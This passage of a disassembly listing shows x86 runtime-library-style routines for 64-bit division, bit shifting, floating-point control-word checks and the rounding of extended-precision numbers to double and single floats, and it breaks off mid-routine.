lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_412AB1
mov esi, [ebp+var_30]
mov [ebx+8], eax
movsx eax, [ebp+var_2A]
mov [ebx], eax
movsx eax, [ebp+var_2C]
mov [ebx+4], eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_10]
push esi
call sub_4076D5
add esp, 24h
test eax, eax
jz short loc_4117EB
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402E3D
add esp, 14h
loc_4117EB: ; CODE XREF: sub_411771+69�j
mov ecx, [ebp+var_4]
pop edi
mov [ebx+0Ch], esi
pop esi
mov eax, ebx
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411771 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411800 proc near ; CODE XREF: sub_410CAD+2F7�p
; sub_410CAD+31D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebp
xor edi, edi
xor ebp, ebp
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_411824
inc edi
inc ebp
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_411824: ; CODE XREF: sub_411800+D�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_411840
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_411840: ; CODE XREF: sub_411800+2A�j
or eax, eax
jnz short loc_41186C
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+0Ch+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+0Ch+arg_8]
add edx, ecx
jmp short loc_4118B3
; ---------------------------------------------------------------------------
loc_41186C: ; CODE XREF: sub_411800+42�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41187A: ; CODE XREF: sub_411800+84�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41187A
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_4118A8
cmp edx, [esp+0Ch+arg_4]
ja short loc_4118A8
jb short loc_4118B1
cmp eax, [esp+0Ch+arg_0]
jbe short loc_4118B1
loc_4118A8: ; CODE XREF: sub_411800+98�j
; sub_411800+9E�j
dec esi
sub eax, [esp+0Ch+arg_8]
sbb edx, [esp+0Ch+arg_C]
loc_4118B1: ; CODE XREF: sub_411800+A0�j
; sub_411800+A6�j
xor ebx, ebx
loc_4118B3: ; CODE XREF: sub_411800+6A�j
sub eax, [esp+0Ch+arg_0]
sbb edx, [esp+0Ch+arg_4]
dec ebp
jns short loc_4118C5
neg edx
neg eax
sbb edx, 0
loc_4118C5: ; CODE XREF: sub_411800+BC�j
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
dec edi
jnz short loc_4118D9
neg edx
neg eax
sbb edx, 0
loc_4118D9: ; CODE XREF: sub_411800+D0�j
pop ebp
pop esi
pop edi
retn 10h
sub_411800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4118E0 proc near ; CODE XREF: sub_410CAD+1EA�p
; sub_410CAD+23E�p ...
cmp cl, 40h
jnb short loc_4118FA
cmp cl, 20h
jnb short loc_4118F0
shrd eax, edx, cl
shr edx, cl
retn
; ---------------------------------------------------------------------------
loc_4118F0: ; CODE XREF: sub_4118E0+8�j
mov eax, edx
xor edx, edx
and cl, 1Fh
shr eax, cl
retn
; ---------------------------------------------------------------------------
loc_4118FA: ; CODE XREF: sub_4118E0+3�j
xor eax, eax
xor edx, edx
retn
sub_4118E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4118FF proc near ; CODE XREF: sub_41136B+E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
and eax, 0FFF7FFFFh
and ecx, eax
test ecx, 0FCF0FCE0h
push esi
jz short loc_411949
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_41192D
push esi
push esi
call sub_4134A7
pop ecx
pop ecx
mov [edi], eax
loc_41192D: ; CODE XREF: sub_4118FF+21�j
call sub_4057D3
push 16h
pop edi
push esi
push esi
push esi
push esi
push esi
mov [eax], edi
call sub_402F39
add esp, 14h
mov eax, edi
pop edi
jmp short loc_411966
; ---------------------------------------------------------------------------
loc_411949: ; CODE XREF: sub_4118FF+17�j
mov esi, [ebp+arg_0]
test esi, esi
push eax
push [ebp+arg_4]
jz short loc_41195D
call sub_4134A7
mov [esi], eax
jmp short loc_411962
; ---------------------------------------------------------------------------
loc_41195D: ; CODE XREF: sub_4118FF+53�j
call sub_4134A7
loc_411962: ; CODE XREF: sub_4118FF+5C�j
pop ecx
pop ecx
xor eax, eax
loc_411966: ; CODE XREF: sub_4118FF+48�j
pop esi
pop ebp
retn
sub_4118FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411969 proc near ; CODE XREF: sub_4114AD+44�p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_4119D3
xor ebx, ebx
xor eax, eax
loc_4119B0: ; CODE XREF: sub_411969+51�j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_4119C3
inc eax
cmp eax, 3
jl short loc_4119B0
xor eax, eax
jmp loc_411E68
; ---------------------------------------------------------------------------
loc_4119C3: ; CODE XREF: sub_411969+4B�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_411E68
; ---------------------------------------------------------------------------
loc_4119D3: ; CODE XREF: sub_411969+41�j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411A0B
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411A0B: ; CODE XREF: sub_411969+9B�j
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411AB1
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411A39
; ---------------------------------------------------------------------------
loc_411A34: ; CODE XREF: sub_411969+D6�j
cmp [ebp+eax*4+var_20], 0
loc_411A39: ; CODE XREF: sub_411969+C9�j
jnz short loc_411A43
inc eax
cmp eax, 3
jl short loc_411A34
jmp short loc_411AB1
; ---------------------------------------------------------------------------
loc_411A43: ; CODE XREF: sub_411969:loc_411A39�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411A5D
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411A5D: ; CODE XREF: sub_411969+ED�j
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411A9C
cmp [ebp+arg_0], edx
jmp short loc_411A9A
; ---------------------------------------------------------------------------
loc_411A7F: ; CODE XREF: sub_411969+143�j
test ecx, ecx
jz short loc_411AAE
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411A9C
cmp esi, 1
loc_411A9A: ; CODE XREF: sub_411969+114�j
jnb short loc_411AA3
loc_411A9C: ; CODE XREF: sub_411969+10F�j
; sub_411969+12C�j
mov [ebp+var_4], 1
loc_411AA3: ; CODE XREF: sub_411969:loc_411A9A�j
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411A7F
loc_411AAE: ; CODE XREF: sub_411969+118�j
mov [ebp+arg_0], ecx
loc_411AB1: ; CODE XREF: sub_411969+B5�j
; sub_411969+D8�j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411AD1
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_411AD1: ; CODE XREF: sub_411969+159�j
cmp [ebp+arg_0], 0
jz short loc_411AD8
inc ebx
loc_411AD8: ; CODE XREF: sub_411969+16C�j
mov eax, dword_424234
mov ecx, eax
sub ecx, dword_424238
cmp ebx, ecx
jge short loc_411AF6
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_411D03
; ---------------------------------------------------------------------------
loc_411AF6: ; CODE XREF: sub_411969+17E�j
cmp ebx, eax
jg loc_411D0D
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_411B24
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411B24: ; CODE XREF: sub_411969+1B4�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411B3F: ; CODE XREF: sub_411969+201�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411B3F
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411B79: ; CODE XREF: sub_411969+227�j
cmp edx, eax
jl short loc_411B85
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411B8A
; ---------------------------------------------------------------------------
loc_411B85: ; CODE XREF: sub_411969+212�j
and [ebp+edx*4+var_20], 0
loc_411B8A: ; CODE XREF: sub_411969+21A�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411B79
mov esi, dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_411BB9
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411BB9: ; CODE XREF: sub_411969+249�j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_411C54
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411BE4
; ---------------------------------------------------------------------------
loc_411BDF: ; CODE XREF: sub_411969+281�j
cmp [ebp+eax*4+var_20], 0
loc_411BE4: ; CODE XREF: sub_411969+274�j
jnz short loc_411BEE
inc eax
cmp eax, 3
jl short loc_411BDF
jmp short loc_411C54
; ---------------------------------------------------------------------------
loc_411BEE: ; CODE XREF: sub_411969:loc_411BE4�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411C08
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411C08: ; CODE XREF: sub_411969+298�j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_411C24
cmp edi, edx
jnb short loc_411C2B
loc_411C24: ; CODE XREF: sub_411969+2B5�j
mov [ebp+arg_0], 1
loc_411C2B: ; CODE XREF: sub_411969+2B9�j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_411C51
; ---------------------------------------------------------------------------
loc_411C32: ; CODE XREF: sub_411969+2E9�j
test ecx, ecx
jz short loc_411C54
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_411C4A
cmp esi, 1
jnb short loc_411C4D
loc_411C4A: ; CODE XREF: sub_411969+2DA�j
xor edi, edi
inc edi
loc_411C4D: ; CODE XREF: sub_411969+2DF�j
mov [ecx], esi
mov ecx, edi
loc_411C51: ; CODE XREF: sub_411969+2C7�j
dec eax
jns short loc_411C32
loc_411C54: ; CODE XREF: sub_411969+263�j
; sub_411969+283�j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411C74
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_411C74: ; CODE XREF: sub_411969+2FC�j
mov ecx, dword_42423C
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411C95
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411C95: ; CODE XREF: sub_411969+325�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411CB0: ; CODE XREF: sub_411969+372�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411CB0
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411CEA: ; CODE XREF: sub_411969+398�j
cmp edx, eax
jl short loc_411CF6
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411CFB
; ---------------------------------------------------------------------------
loc_411CF6: ; CODE XREF: sub_411969+383�j
and [ebp+edx*4+var_20], 0
loc_411CFB: ; CODE XREF: sub_411969+38B�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411CEA
loc_411D03: ; CODE XREF: sub_411969+188�j
push 2
xor ebx, ebx
pop eax
jmp loc_411E67
; ---------------------------------------------------------------------------
loc_411D0D: ; CODE XREF: sub_411969+18F�j
cmp ebx, dword_424230
mov ecx, dword_42423C
jl loc_411DCC
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411D48
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411D48: ; CODE XREF: sub_411969+3D8�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411D63: ; CODE XREF: sub_411969+425�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411D63
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411D9D: ; CODE XREF: sub_411969+44B�j
cmp edx, eax
jl short loc_411DA9
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411DAE
; ---------------------------------------------------------------------------
loc_411DA9: ; CODE XREF: sub_411969+436�j
and [ebp+edx*4+var_20], 0
loc_411DAE: ; CODE XREF: sub_411969+43E�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411D9D
mov eax, dword_424230
mov ecx, dword_424244
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_411E67
; ---------------------------------------------------------------------------
loc_411DCC: ; CODE XREF: sub_411969+3B0�j
mov eax, dword_424244
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411DF4
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411DF4: ; CODE XREF: sub_411969+484�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_411E0F: ; CODE XREF: sub_411969+4D4�j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_411E0F
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411E4C: ; CODE XREF: sub_411969+4FA�j
cmp edx, eax
jl short loc_411E58
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411E5D
; ---------------------------------------------------------------------------
loc_411E58: ; CODE XREF: sub_411969+4E5�j
and [ebp+edx*4+var_20], 0
loc_411E5D: ; CODE XREF: sub_411969+4ED�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411E4C
xor eax, eax
loc_411E67: ; CODE XREF: sub_411969+39F�j
; sub_411969+45E�j
pop esi
loc_411E68: ; CODE XREF: sub_411969+55�j
; sub_411969+65�j
push 1Fh
pop ecx
sub ecx, dword_42423C
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, dword_424240
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_411E9D
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_411EA7
; ---------------------------------------------------------------------------
loc_411E9D: ; CODE XREF: sub_411969+525�j
cmp ecx, 20h
jnz short loc_411EA7
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_411EA7: ; CODE XREF: sub_411969+532�j
; sub_411969+537�j
pop edi
pop ebx
leave
retn
sub_411969 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411EAB proc near ; CODE XREF: sub_411553+44�p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_411F15
xor ebx, ebx
xor eax, eax
loc_411EF2: ; CODE XREF: sub_411EAB+51�j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_411F05
inc eax
cmp eax, 3
jl short loc_411EF2
xor eax, eax
jmp loc_4123AA
; ---------------------------------------------------------------------------
loc_411F05: ; CODE XREF: sub_411EAB+4B�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_4123AA
; ---------------------------------------------------------------------------
loc_411F15: ; CODE XREF: sub_411EAB+41�j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411F4D
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411F4D: ; CODE XREF: sub_411EAB+9B�j
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411FF3
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411F7B
; ---------------------------------------------------------------------------
loc_411F76: ; CODE XREF: sub_411EAB+D6�j
cmp [ebp+eax*4+var_20], 0
loc_411F7B: ; CODE XREF: sub_411EAB+C9�j
jnz short loc_411F85
inc eax
cmp eax, 3
jl short loc_411F76
jmp short loc_411FF3
; ---------------------------------------------------------------------------
loc_411F85: ; CODE XREF: sub_411EAB:loc_411F7B�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411F9F
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411F9F: ; CODE XREF: sub_411EAB+ED�j
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411FDE
cmp [ebp+arg_0], edx
jmp short loc_411FDC
; ---------------------------------------------------------------------------
loc_411FC1: ; CODE XREF: sub_411EAB+143�j
test ecx, ecx
jz short loc_411FF0
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411FDE
cmp esi, 1
loc_411FDC: ; CODE XREF: sub_411EAB+114�j
jnb short loc_411FE5
loc_411FDE: ; CODE XREF: sub_411EAB+10F�j
; sub_411EAB+12C�j
mov [ebp+var_4], 1
loc_411FE5: ; CODE XREF: sub_411EAB:loc_411FDC�j
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411FC1
loc_411FF0: ; CODE XREF: sub_411EAB+118�j
mov [ebp+arg_0], ecx
loc_411FF3: ; CODE XREF: sub_411EAB+B5�j
; sub_411EAB+D8�j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_412013
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_412013: ; CODE XREF: sub_411EAB+159�j
cmp [ebp+arg_0], 0
jz short loc_41201A
inc ebx
loc_41201A: ; CODE XREF: sub_411EAB+16C�j
mov eax, dword_42424C
mov ecx, eax
sub ecx, dword_424250
cmp ebx, ecx
jge short loc_412038
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_412245
; ---------------------------------------------------------------------------
loc_412038: ; CODE XREF: sub_411EAB+17E�j
cmp ebx, eax
jg loc_41224F
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_412066
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412066: ; CODE XREF: sub_411EAB+1B4�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_412081: ; CODE XREF: sub_411EAB+201�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_412081
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4120BB: ; CODE XREF: sub_411EAB+227�j
cmp edx, eax
jl short loc_4120C7
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4120CC
; ---------------------------------------------------------------------------
loc_4120C7: ; CODE XREF: sub_411EAB+212�j
and [ebp+edx*4+var_20], 0
loc_4120CC: ; CODE XREF: sub_411EAB+21A�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_4120BB
mov esi, dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_4120FB
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4120FB: ; CODE XREF: sub_411EAB+249�j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_412196
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_412126
; ---------------------------------------------------------------------------
loc_412121: ; CODE XREF: sub_411EAB+281�j
cmp [ebp+eax*4+var_20], 0
loc_412126: ; CODE XREF: sub_411EAB+274�j
jnz short loc_412130
inc eax
cmp eax, 3
jl short loc_412121
jmp short loc_412196
; ---------------------------------------------------------------------------
loc_412130: ; CODE XREF: sub_411EAB:loc_412126�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_41214A
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_41214A: ; CODE XREF: sub_411EAB+298�j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_412166
cmp edi, edx
jnb short loc_41216D
loc_412166: ; CODE XREF: sub_411EAB+2B5�j
mov [ebp+arg_0], 1
loc_41216D: ; CODE XREF: sub_411EAB+2B9�j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_412193
; ---------------------------------------------------------------------------
loc_412174: ; CODE XREF: sub_411EAB+2E9�j
test ecx, ecx
jz short loc_412196
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_41218C
cmp esi, 1
jnb short loc_41218F
loc_41218C: ; CODE XREF: sub_411EAB+2DA�j
xor edi, edi
inc edi
loc_41218F: ; CODE XREF: sub_411EAB+2DF�j
mov [ecx], esi
mov ecx, edi
loc_412193: ; CODE XREF: sub_411EAB+2C7�j
dec eax
jns short loc_412174
loc_412196: ; CODE XREF: sub_411EAB+263�j
; sub_411EAB+283�j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_4121B6
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_4121B6: ; CODE XREF: sub_411EAB+2FC�j
mov ecx, dword_424254
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
